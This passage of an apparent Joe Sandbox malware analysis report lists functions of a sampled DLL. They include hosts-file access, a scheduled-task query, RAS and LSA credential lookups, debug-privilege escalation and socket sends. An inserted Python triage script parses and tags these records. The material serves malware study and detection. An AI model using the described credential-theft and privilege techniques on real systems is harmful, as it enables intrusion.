                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileLocal$CloseFreeHandleProcessSize$AllocAttributesCreateCurrentDirectoryReadWindowsWow64
                                                          • String ID: \sysnative\drivers\etc\hosts$\system32\drivers\etc\hosts
                                                          • API String ID: 2528494210-1011561390
                                                          • Opcode ID: b3a1b05fe94a7ef03e9c76f26f647362320a5b5e58716595bdb8bd7f185e6a4f
                                                          • Instruction ID: 0dc2874ec59e71b04e8ffe4cacdfc1c4cd4d7ebfa2bc456f337be279ea52e32f
                                                          • Opcode Fuzzy Hash: b3a1b05fe94a7ef03e9c76f26f647362320a5b5e58716595bdb8bd7f185e6a4f
                                                          • Instruction Fuzzy Hash: CA31E5352002146FE3159F78DC89FEB77A8FB88320F144B2DF75A921D0DBB499098765
                                                          APIs
                                                          • CreatePipe.KERNEL32 ref: 10020A72
                                                          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,08000000,00000000,00000000,00000044,?), ref: 10020AED
                                                          • CloseHandle.KERNEL32(?), ref: 10020AFA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Create$CloseHandlePipeProcess
                                                          • String ID: D$schtasks /Query /TN MM
                                                          • API String ID: 1262542551-2635328053
                                                          • Opcode ID: a5ddbd22c73d49735de37707cb875a3f661527166062486b8fd150345d17fcb8
                                                          • Instruction ID: 0981537ea3ed7163310ddf7b13f575be98c0f6f7661eef0bbbfb29fdb67919c4
                                                          • Opcode Fuzzy Hash: a5ddbd22c73d49735de37707cb875a3f661527166062486b8fd150345d17fcb8
                                                          • Instruction Fuzzy Hash: A851DF75604351AFD721CF28C884AEFBBE6FB88744F944A1EF98987240D77599048B92
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: getenv
                                                          • String ID: JSIMD_FORCE3DNOW$JSIMD_FORCEAVX2$JSIMD_FORCEMMX$JSIMD_FORCENONE$JSIMD_FORCESSE$JSIMD_FORCESSE2$JSIMD_NOHUFFENC
                                                          • API String ID: 498649692-40509672
                                                          • Opcode ID: 372bc83dcd6d19d883c5cd6b0a874edae0f2d566c33e9c8da4bd2e16f7e542bf
                                                          • Instruction ID: 61bb3af44d43969043d6c6946545a93c985996945898b62b2316370d7146a686
                                                          • Opcode Fuzzy Hash: 372bc83dcd6d19d883c5cd6b0a874edae0f2d566c33e9c8da4bd2e16f7e542bf
                                                          • Instruction Fuzzy Hash: FA2129EBA202442FF755E2327D4976531C1E7A13E2FDA8131E804DF6C2FA28DC469392
                                                          APIs
                                                          • LoadLibraryA.KERNEL32 ref: 10005AA7
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10005AAE
                                                            • Part of subcall function 10005310: LoadLibraryA.KERNEL32(kernel32.dll,FreeLibrary,?,L$_RasDefaultCredentials#0,00000000), ref: 1000532C
                                                            • Part of subcall function 10005310: GetProcAddress.KERNEL32(00000000), ref: 10005335
                                                            • Part of subcall function 10005310: LoadLibraryA.KERNEL32 ref: 10005386
                                                            • Part of subcall function 10005310: GetProcAddress.KERNEL32(00000000), ref: 10005389
                                                            • Part of subcall function 10005310: LoadLibraryA.KERNEL32(?,IsValidSid), ref: 10005397
                                                            • Part of subcall function 10005310: GetProcAddress.KERNEL32(00000000), ref: 1000539A
                                                          • wsprintfA.USER32 ref: 10005B17
                                                            • Part of subcall function 100058B0: LoadLibraryA.KERNEL32 ref: 1000590A
                                                            • Part of subcall function 100058B0: GetProcAddress.KERNEL32(00000000), ref: 10005913
                                                            • Part of subcall function 100058B0: LoadLibraryA.KERNEL32(?,LsaOpenPolicy), ref: 10005923
                                                            • Part of subcall function 100058B0: GetProcAddress.KERNEL32(00000000), ref: 10005926
                                                            • Part of subcall function 100058B0: LoadLibraryA.KERNEL32(?,LsaClose), ref: 10005934
                                                            • Part of subcall function 100058B0: GetProcAddress.KERNEL32(00000000), ref: 10005937
                                                            • Part of subcall function 10005B80: LoadLibraryA.KERNEL32(KERNEL32.dll,WideCharToMultiByte,?,00000000,00000000), ref: 10005B96
                                                            • Part of subcall function 10005B80: GetProcAddress.KERNEL32(00000000), ref: 10005B9D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc$wsprintf
                                                          • String ID: .$2$3$D$I$L$_RasDefaultCredentials#0$LsaFreeMemory$P$RasDialParams!%s#0$V$d
                                                          • API String ID: 2290142023-608447665
                                                          • Opcode ID: ce02f7ea02b34bf1def763f01addefc66c280edfd5cd4819a27cc4b3bb6cd685
                                                          • Instruction ID: 4c1d29f0bd828654cd513fdf21a7457cee7c04ca4083380b940b1afa8f540c18
                                                          • Opcode Fuzzy Hash: ce02f7ea02b34bf1def763f01addefc66c280edfd5cd4819a27cc4b3bb6cd685
                                                          • Instruction Fuzzy Hash: 123105751083809FE301CF68C894A6BBBE9AF99B04F44495CF5C987342D775E90CCBA6
                                                          APIs
                                                          • LoadLibraryA.KERNEL32 ref: 1000105A
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10001061
                                                          • #823.MFC42(000003E8), ref: 1000109D
                                                          • #823.MFC42(00000020,000003E8), ref: 100010A7
                                                          • #823.MFC42(000003E8,00000020,000003E8), ref: 100010B2
                                                          • #823.MFC42(00000020,000003E8,00000020,000003E8), ref: 100010BC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: #823$AddressLibraryLoadProc
                                                          • String ID: A$C$E$KERNEL32.dll$a$n$r$v
                                                          • API String ID: 4155842574-2549505875
                                                          • Opcode ID: a16daf83469977fc098d6e9d6d2204c32631686849e5759c66df8540c12cc638
                                                          • Instruction ID: d4cdf86d6ce510d6661d11d19ce4d48ee2c343f99e241af99f0dca74e59b5833
                                                          • Opcode Fuzzy Hash: a16daf83469977fc098d6e9d6d2204c32631686849e5759c66df8540c12cc638
                                                          • Instruction Fuzzy Hash: 9E317CB04087819ED310CF69D844647FBE8FF59308F44495EE1C987712D7B9E648CBAA
                                                          APIs
                                                          • GetSystemDirectoryA.KERNEL32(00000000,00000104), ref: 10027190
                                                          • lstrcatA.KERNEL32(?,\termsrv.dll), ref: 100271A0
                                                            • Part of subcall function 1001B690: GetCurrentProcess.KERNEL32(00000028,00000000,00000001,?,?), ref: 1001B69A
                                                            • Part of subcall function 1001B690: OpenProcessToken.ADVAPI32(00000000), ref: 1001B6A1
                                                            • Part of subcall function 100270F0: CreateToolhelp32Snapshot.KERNEL32 ref: 10027105
                                                            • Part of subcall function 100270F0: Process32First.KERNEL32(00000000,?), ref: 10027112
                                                            • Part of subcall function 100270F0: Process32Next.KERNEL32(00000000,?), ref: 10027150
                                                            • Part of subcall function 100270F0: CloseHandle.KERNEL32(00000000,00000000,?), ref: 1002715B
                                                            • Part of subcall function 1001B690: LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 1001B6D2
                                                            • Part of subcall function 1001B690: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 1001B6EA
                                                            • Part of subcall function 1001B690: GetLastError.KERNEL32(?,00000000,?,00000010,00000000,00000000), ref: 1001B6F0
                                                            • Part of subcall function 1001B690: CloseHandle.KERNEL32(00000000,?,00000000,?,00000010,00000000,00000000), ref: 1001B6FF
                                                            • Part of subcall function 1001B690: CloseHandle.KERNEL32(?,?,00000000,?,00000010,00000000,00000000), ref: 1001B710
                                                          • GetProcessId.KERNEL32(csrss.exe,?,?,?,00000065,?,?,\termsrv.dll), ref: 100271E9
                                                          • AbortSystemShutdownA.ADVAPI32(00000000), ref: 100271F9
                                                          • GetProcessId.KERNEL32(drwtsn32.exe,?,771B0F00,?,?,?,00000065,?,?,\termsrv.dll), ref: 10027212
                                                          • EnumWindows.USER32(10026EF0,00000000), ref: 10027222
                                                          • EnumWindows.USER32(10026EF0,00000000), ref: 1002722A
                                                          • Sleep.KERNEL32(0000000A,?,771B0F00,?,?,?,00000065,?,?,\termsrv.dll), ref: 1002722E
                                                          • AbortSystemShutdownA.ADVAPI32(00000000), ref: 10027232
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process$CloseHandleSystem$AbortEnumProcess32ShutdownTokenWindows$AdjustCreateCurrentDirectoryErrorFirstLastLookupNextOpenPrivilegePrivilegesSleepSnapshotToolhelp32Valuelstrcat
                                                          • String ID: SeDebugPrivilege$SeShutdownPrivilege$\termsrv.dll$csrss.exe$drwtsn32.exe
                                                          • API String ID: 1044539573-3630850118
                                                          • Opcode ID: c58a50b7ba612e40a225f9186a65e155ab20136a55424810904a3657379bc63a
                                                          • Instruction ID: 799067c6e7043d64c921be5b6f4e7f39e9bfd6ad8c0208510c147185ede4a413
                                                          • Opcode Fuzzy Hash: c58a50b7ba612e40a225f9186a65e155ab20136a55424810904a3657379bc63a
                                                          • Instruction Fuzzy Hash: C811E97D600719B7F610E7B4AC85FDA3758FB54744F840415F708990D1EB75E8448676
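The function above is the one most worth pulling out of this listing: it builds the path `%SystemDir%\termsrv.dll`, enables `SeDebugPrivilege` and `SeShutdownPrivilege` on its own token (OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, then GetLastError for the result), walks the process list with Toolhelp32 and resolves `csrss.exe` and `drwtsn32.exe` to PIDs. Reading hundreds of such records by hand is slow, so the following added example (written for this page, not Joe Sandbox code) parses records in the exact text shape this report uses and tags each one with the behaviour cluster its API set and strings imply. The input is constructed from three records on this page (the `schtasks /Query /TN MM` routine, the termsrv.dll routine, and the ws2_32 `closesocket`/`send` resolver); the tag names and the detection rules are this example's own choices, not report fields.

```python
"""Triage helper for Joe Sandbox per-function records (added example, not tool output)."""
import re
from dataclasses import dataclass, field
from typing import Dict, List

# One API line of a function record, in the three shapes this report uses:
#   • lstrcatA.KERNEL32(?,\termsrv.dll), ref: 100271A0
#   • Part of subcall function 1001B690: OpenProcessToken.ADVAPI32(00000000), ref: 1001B6A1
#   • wsprintfA.USER32 ref: 10012683            (no argument list at all)
API_LINE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<name>[#\w]+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)$"
)
PLACEHOLDER = re.compile(r"[0-9A-F?]+")  # hex constant or unknown value, not a symbol


@dataclass
class FunctionRecord:
    apis: List[dict] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)
    resolved_imports: List[str] = field(default_factory=list)  # names passed to GetProcAddress
    opcode_id: str = ""

    def api_names(self) -> set:
        return {a["name"] for a in self.apis}


def parse_records(text: str) -> List[FunctionRecord]:
    """Split report text into records; each record ends at its 'Instruction Fuzzy Hash' line."""
    records, cur = [], FunctionRecord()
    for raw in text.splitlines():
        line = raw.strip()
        m = API_LINE.match(line)
        if m:
            cur.apis.append(m.groupdict())
            args = (m["args"] or "").split(",")
            # GetProcAddress(hModule, "name"): a symbolic second argument is an import the
            # sample resolves at run time instead of declaring in its import table.
            if m["name"] == "GetProcAddress" and len(args) > 1 and not PLACEHOLDER.fullmatch(args[1]):
                cur.resolved_imports.append(args[1])
        elif line.startswith("• String ID:"):
            # The report joins strings with '$'; a literal '$' inside a string would split wrongly.
            cur.strings = [s for s in line.split(":", 1)[1].strip().split("$") if s]
        elif line.startswith("• Opcode ID:"):
            cur.opcode_id = line.split(":", 1)[1].strip()
        elif line.startswith("• Instruction Fuzzy Hash:"):
            records.append(cur)
            cur = FunctionRecord()
    return records


def classify(rec: FunctionRecord) -> List[str]:
    """Behaviour tags (this example's own labels) derived from the API set and strings."""
    names, tags = rec.api_names(), []
    if {"OpenProcessToken", "LookupPrivilegeValueA", "AdjustTokenPrivileges"} <= names:
        tags.append("token-privilege-adjustment")
        # AdjustTokenPrivileges returns TRUE even when a privilege was not granted; the
        # GetLastError right after it is the ERROR_NOT_ALL_ASSIGNED check the sample performs.
        if "GetLastError" in names:
            tags.append("checks-privilege-result")
    if any(s.lower().endswith("termsrv.dll") for s in rec.strings) and "GetSystemDirectoryA" in names:
        tags.append("termsrv-dll-path-build")
    if any(s.startswith("schtasks") for s in rec.strings):
        tags.append("scheduled-task-query")
    if {"LoadLibraryA", "GetProcAddress"} <= names:
        tags.append("dynamic-api-resolution")
    if {"CreateToolhelp32Snapshot", "Process32First", "Process32Next"} <= names:
        tags.append("process-enumeration")
    return tags


def summarize(text: str) -> Dict[str, List[str]]:
    """Map each record's Opcode ID to the tags it earns."""
    return {r.opcode_id: classify(r) for r in parse_records(text)}


# Constructed input: three records copied from this report, trimmed to the lines that matter.
SAMPLE_REPORT = r"""
• API ID: Create$CloseHandlePipeProcess
• String ID: D$schtasks /Query /TN MM
• Opcode ID: a5ddbd22c73d49735de37707cb875a3f661527166062486b8fd150345d17fcb8
• Instruction Fuzzy Hash: A851DF75604351AFD721CF28C884AEFBBE6FB88744F944A1EF98987240D77599048B92
APIs
• GetSystemDirectoryA.KERNEL32(00000000,00000104), ref: 10027190
• lstrcatA.KERNEL32(?,\termsrv.dll), ref: 100271A0
  • Part of subcall function 1001B690: OpenProcessToken.ADVAPI32(00000000), ref: 1001B6A1
  • Part of subcall function 100270F0: CreateToolhelp32Snapshot.KERNEL32 ref: 10027105
  • Part of subcall function 100270F0: Process32First.KERNEL32(00000000,?), ref: 10027112
  • Part of subcall function 100270F0: Process32Next.KERNEL32(00000000,?), ref: 10027150
  • Part of subcall function 1001B690: LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 1001B6D2
  • Part of subcall function 1001B690: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 1001B6EA
  • Part of subcall function 1001B690: GetLastError.KERNEL32(?,00000000,?,00000010,00000000,00000000), ref: 1001B6F0
• GetProcessId.KERNEL32(csrss.exe,?,?,?,00000065,?,?,\termsrv.dll), ref: 100271E9
• AbortSystemShutdownA.ADVAPI32(00000000), ref: 100271F9
Memory Dump Source
• Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
• String ID: SeDebugPrivilege$SeShutdownPrivilege$\termsrv.dll$csrss.exe$drwtsn32.exe
• Opcode ID: c58a50b7ba612e40a225f9186a65e155ab20136a55424810904a3657379bc63a
• Instruction Fuzzy Hash: C811E97D600719B7F610E7B4AC85FDA3758FB54744F840415F708990D1EB75E8448676
APIs
• LoadLibraryA.KERNEL32(ws2_32.dll), ref: 10012641
• GetProcAddress.KERNEL32(00000000,closesocket), ref: 10012651
• wsprintfA.USER32 ref: 10012683
• LoadLibraryA.KERNEL32(ws2_32.dll), ref: 10012730
• GetProcAddress.KERNEL32(00000000,send), ref: 1001273C
• FreeLibrary.KERNEL32(?), ref: 10012794
• String ID: ID= %d $closesocket$send$ws2_32.dll
• Opcode ID: 1e004e0467ac5dc5021d6473d21da3e49f18c438dae7c27dbc7de7b95a398db1
• Instruction Fuzzy Hash: 5941B3B9608355AFD714DF78CC88B9BB7E4FB88344F040A18F985DB281D774E9608B61
"""

if __name__ == "__main__":
    for opcode_id, tags in summarize(SAMPLE_REPORT).items():
        print(opcode_id[:16], ", ".join(tags) or "-")
```

The Opcode ID is the stable key to pivot on: it is a hash of the function's opcodes, so the same value in another report means the same routine, and the tags computed here transfer with it. The `resolved_imports` list is the part worth feeding back into static analysis, since names that only appear as GetProcAddress arguments (here `closesocket` and `send`) never show up in the PE import table.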
                                                          APIs
                                                          • #823.MFC42(0000001C,00000000,?,00000000,00000000,?,10006386,?,?,00000000,?,?,00000000,?,?), ref: 10006540
                                                          • #825.MFC42(00000000,00000000,?,00000000,00000000,?,10006386,?,?,00000000,?,?,00000000,?,?), ref: 10006583
                                                          • #823.MFC42(?,00000000,?,00000000,00000000,?,10006386,?,?,00000000,?,?,00000000,?,?), ref: 10006597
                                                          • #825.MFC42(00000000,00000000,?,00000000,00000000,?,10006386,?,?,00000000,?,?,00000000,?,?), ref: 100065DD
                                                          • #823.MFC42(?,00000000,?,00000000,00000000,?,10006386,?,?,00000000,?,?,00000000,?,?), ref: 100065F1
                                                          • #825.MFC42(?,00000000,?,00000000,00000000,?,10006386,?,?,00000000,?,?,00000000,?,?), ref: 10006637
                                                          • #823.MFC42(?,00000000,?,00000000,00000000,?,10006386,?,?,00000000,?,?,00000000,?,?), ref: 1000664B
                                                          • #825.MFC42(?,00000000,?,00000000,00000000,?,10006386,?,?,00000000,?,?,00000000,?,?), ref: 10006691
                                                          • #823.MFC42(?,00000000,?,00000000,00000000,?,10006386,?,?,00000000,?,?,00000000,?,?), ref: 100066A5
                                                          • #825.MFC42(?,00000000,?,00000000,00000000,?,10006386,?,?,00000000,?,?,00000000,?,?), ref: 100066EB
                                                          • #823.MFC42(?,00000000,?,00000000,00000000,?,10006386,?,?,00000000,?,?,00000000,?,?), ref: 100066FF
                                                          • #825.MFC42(?,?,?), ref: 10006758
                                                          • #823.MFC42(?,?,?), ref: 1000676C
                                                          • #825.MFC42(00000000,?,?), ref: 100067B1
                                                          • #823.MFC42(?,?,?), ref: 100067C5
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: #823$#825
                                                          • String ID:
                                                          • API String ID: 2704444950-0
                                                          • Opcode ID: 7bec8dbf16562bad003da3af1f42c1a03097033c04e808ff0bba191b4fb42cb9
                                                          • Instruction ID: 60a5b56d8eae0c97300d1150149c5d3cd1187e5e90251027326246755cc62438
                                                          • Opcode Fuzzy Hash: 7bec8dbf16562bad003da3af1f42c1a03097033c04e808ff0bba191b4fb42cb9
                                                          • Instruction Fuzzy Hash: 0BC1D0B57046054BEB18CE38D89292B77D2EF982A0B65863CFD1A877C5DF71ED058780
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(ws2_32.dll), ref: 10012641
                                                          • GetProcAddress.KERNEL32(00000000,closesocket), ref: 10012651
                                                          • wsprintfA.USER32 ref: 10012683
                                                          • CloseHandle.KERNEL32(00000000), ref: 100126D7
                                                          • Sleep.KERNEL32(00000002), ref: 100126F1
                                                          • LoadLibraryA.KERNEL32(ws2_32.dll), ref: 10012730
                                                          • GetProcAddress.KERNEL32(00000000,send), ref: 1001273C
                                                          • FreeLibrary.KERNEL32(?), ref: 10012794
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Library$AddressLoadProc$CloseFreeHandleSleepwsprintf
                                                          • String ID: ID= %d $closesocket$send$ws2_32.dll
                                                          • API String ID: 1680113600-2339802411
                                                          • Opcode ID: 1e004e0467ac5dc5021d6473d21da3e49f18c438dae7c27dbc7de7b95a398db1
                                                          • Instruction ID: c6c0da67d46d13d68f268ba758adfad6d1a8e6a04e0d0a6cfae2b139a2cc5429
                                                          • Opcode Fuzzy Hash: 1e004e0467ac5dc5021d6473d21da3e49f18c438dae7c27dbc7de7b95a398db1
                                                          • Instruction Fuzzy Hash: 5941B3B9608355AFD714DF78CC88B9BB7E4FB88344F040A18F985DB281D774E9608B61
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(KERNEL32.dll,MultiByteToWideChar,00000000,?,0000005C,?,1000620E,00000000), ref: 10006416
                                                          • GetProcAddress.KERNEL32(00000000), ref: 1000641F
                                                          • LoadLibraryA.KERNEL32(KERNEL32.dll,WideCharToMultiByte,?,0000005C,?,1000620E,00000000), ref: 1000642F
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10006432
                                                          • LoadLibraryA.KERNEL32(KERNEL32.dll,lstrlenA,?,0000005C,?,1000620E,00000000), ref: 10006442
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10006445
                                                          • #823.MFC42(00000002,?,0000005C,?,1000620E,00000000), ref: 10006461
                                                          • #823.MFC42(00000002,00000002,?,0000005C,?,1000620E,00000000), ref: 10006469
                                                          • #825.MFC42(00000000,?,0000005C,?,1000620E,00000000), ref: 10006495
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc$#823$#825
